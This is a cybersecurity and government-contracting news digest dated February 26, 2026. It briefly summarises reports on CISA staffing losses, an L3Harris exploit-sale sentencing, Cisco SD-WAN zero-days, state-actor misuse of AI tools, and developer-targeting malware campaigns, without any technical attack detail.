ClearSignal — Feb 26, 2026

CISA has lost one-third of its workforce in the past year, creating a critical capacity gap at the federal agency responsible for defending U.S. critical infrastructure and coordinating cybersecurity response. With bipartisan concern over the agency's ability to handle major cyber crises, this personnel crisis directly threatens national security readiness and should inform workforce planning and agency engagement strategies for any GovCon executive. A former L3Harris defense contractor executive received over seven years in prison for stealing and selling zero-day exploits to Russian intelligence brokers, representing one of the most serious insider threat cases in recent defense contracting history. This case underscores the critical importance of insider risk programs, supply chain security, and the real consequences of inadequate security controls in the defense industrial base. Google disrupted a sophisticated Chinese state-sponsored espionage campaign that weaponized legitimate SaaS API calls to evade detection while targeting telecom firms and government agencies worldwide. This represents an evolution in adversary tradecraft that bypasses traditional security controls, requiring GovCon organizations to rethink their detection strategies and understand how nation-state actors are exploiting trusted cloud services.

Top 3

CISA has lost one-third of its workforce in the past year, creating a critical capacity gap at the federal agency responsible for defending U.S. critical infrastructure and coordinating cybersecurity response. With bipartisan concern over the agency’s ability to handle major cyber crises, this personnel crisis directly threatens national security readiness and should inform workforce planning and agency engagement strategies for any GovCon executive. — cyberscoop
A former L3Harris defense contractor executive received over seven years in prison for stealing and selling zero-day exploits to Russian intelligence brokers, representing one of the most serious insider threat cases in recent defense contracting history. This case underscores the critical importance of insider risk programs, supply chain security, and the real consequences of inadequate security controls in the defense industrial base. — bleeping-computer
Google disrupted a sophisticated Chinese state-sponsored espionage campaign that weaponized legitimate SaaS API calls to evade detection while targeting telecom firms and government agencies worldwide. This represents an evolution in adversary tradecraft that bypasses traditional security controls, requiring GovCon organizations to rethink their detection strategies and understand how nation-state actors are exploiting trusted cloud services. — bleeping-computer

Competitive Landscape

Marquis Software Solutions filed a lawsuit against SonicWall alleging gross negligence and misrepresentation that resulted in a ransomware attack affecting operations at 74 U.S. banks. — bleeping-computer

Policy & Regulatory

The U.S. Treasury Department sanctioned a Russian exploit broker who purchased stolen zero-day hacking tools from a former U.S. defense contractor executive. — bleeping-computer
The former head of Trenchant, a specialized U.S. defense contractor unit under L3Harris, was sentenced to over seven years in prison for stealing and selling zero-day exploits to a Russian broker with Russian government clients. — bleeping-computer
China’s top prosecutorial agency reported handling hundreds of domestic cases involving commercial espionage and technology theft since 2021. This signals increased Chinese government attention to internal intellectual property protection and technology leakage. — the-record
Ukrainian President Volodymyr Zelenskyy announced that Ukrainian officials will meet with Trump administration envoys in Geneva, with U.S.-brokered talks between Ukraine and Russia expected next week. These diplomatic engagements could impact ongoing conflict dynamics. — defense-news
PowerSchool and Chicago Public Schools agreed to a $17.25 million settlement for a student data privacy lawsuit affecting over 10 million class members, with PowerSchool also required to establish a web governance committee to monitor certain actions. — the-record
The FTC issued a policy statement clarifying it will not enforce COPPA against website and online service providers who properly use age verification technologies to collect, use, and share personal data. — the-record

Agency & Mission Activity

CISA has lost one-third of its workforce over the past year, with bipartisan lawmakers and industry stakeholders expressing concern that the agency is now unprepared to handle potential cybersecurity crises. The personnel cuts have significantly impacted the agency’s operational capacity. — cyberscoop
CISA issued an emergency directive requiring federal agencies to immediately patch critical vulnerabilities in Cisco networking devices by Friday. — federal-news-network
The U.S. Army is adapting its armored brigade tactics and formations based on lessons learned from Ukraine’s battlefield experience with tanks and heavy firepower, rethinking how units move and survive in modern combat. — defense-news

Technology Trends

Zyxel released security patches for a critical remote code execution vulnerability affecting over a dozen router models that could allow unauthenticated attackers to compromise unpatched devices. — bleeping-computer
A Moscow resident has been accused of impersonating a Russian FSB officer to extort money from the Conti ransomware gang, according to local media reports. — the-record
VulnCheck research indicates that while vulnerabilities proliferated in 2025, only 1% were actually weaponized in attacks, suggesting defenders are wasting resources on unsubstantiated exploit concepts. — cyberscoop
OpenAI discovered that a Chinese law enforcement agency used ChatGPT to upload reports detailing a global digital surveillance and harassment operation targeting regime critics both domestically and internationally. This revelation exposes how adversaries are leveraging commercial AI tools for intelligence and influence operations. — cyberscoop
Multiple cybersecurity incidents this week include low-skill actors compromising 600 Fortinet devices using AI-generated playbooks, Anthropic exposing Chinese AI model theft, and a seven-year sentence for Peter Williams for selling L3 Harris Trenchant exploits to Russia. Additional revelations show Ivanti was breached in 2021 through vulnerabilities in its own products. — risky-business
Attackers are using telephone-oriented attack delivery (TOAD) to bypass email security gateways by including only phone numbers in email payloads rather than malicious links or attachments. This technique evades traditional email security controls that scan for malicious content. — dark-reading
OpenClaw vulnerability has generated significant discussion on Telegram and dark web forums, but Flare’s analysis indicates more research interest than actual mass exploitation. Supply-chain risks exist in skills marketplaces, but evidence of large-scale criminal operations remains limited. — bleeping-computer
Massachusetts-based medical device manufacturer UFP Technologies reported a cyberattack in February that may have resulted in data theft or destruction, and has deployed backup data systems in response. The company disclosed the incident in a regulatory filing. — the-record
Microsoft Defender team uncovered a coordinated campaign targeting software developers with malicious repositories disguised as legitimate Next.js projects and recruitment coding tests to deliver backdoors. — bleeping-computer
Cisco disclosed CVE-2026-20127, a critical authentication bypass vulnerability in Cisco Catalyst SD-WAN that has been actively exploited in zero-day attacks since 2023, allowing remote attackers to compromise controllers and add malicious rogue peers. — bleeping-computer
Google’s Threat Intelligence Group and Mandiant disrupted a Chinese state-sponsored espionage campaign that used SaaS API calls to conceal malicious traffic while targeting dozens of telecom firms and government agencies globally. — bleeping-computer
DoD officials are advancing a proactive approach to operational technology (OT) security through zero trust architecture and risk operations centers in response to ongoing adversary targeting of critical U.S. infrastructure. — federal-news-network
Discord has paused its global age verification policy following user backlash, with co-founder Stanislav Vishnevskiy acknowledging the company failed to clearly communicate the policy’s purpose and implementation. — the-record
CISA issued an emergency directive warning that threat actors are actively exploiting Cisco SD-WAN vulnerabilities, posing significant risks to federal civilian executive branch networks. The warning was issued in coordination with Five Eyes intelligence allies. — the-record
Law enforcement seizure of RAMP ransomware forum disrupts the ransomware ecosystem, with researchers advising defenders to monitor how threat groups reorganize and leverage intelligence for defensive planning. — dark-reading
North Korean threat actors are deploying malicious Next.js repositories disguised as job opportunities to compromise developers and establish persistent access to target systems. — dark-reading
CISA and Five Eyes partners issued warnings about a global campaign exploiting Cisco zero-day vulnerabilities in edge technology, with attacks dating back to 2023. This marks the second such series of actively exploited zero-days in Cisco edge devices since last spring. — cyberscoop
Chinese police conducted politically motivated influence operations against Japanese Prime Minister Takaichi using ChatGPT, with operational details inadvertently leaked through a ChatGPT account. This reveals state-sponsored use of AI tools for disinformation campaigns. — dark-reading
Security vulnerabilities discovered in Anthropic’s Claude AI code assistant expose developers’ machines to risk and highlight supply chain security concerns when integrating AI into software development workflows. The flaws demonstrate significant drawbacks to AI-assisted development tools. — dark-reading

← Archive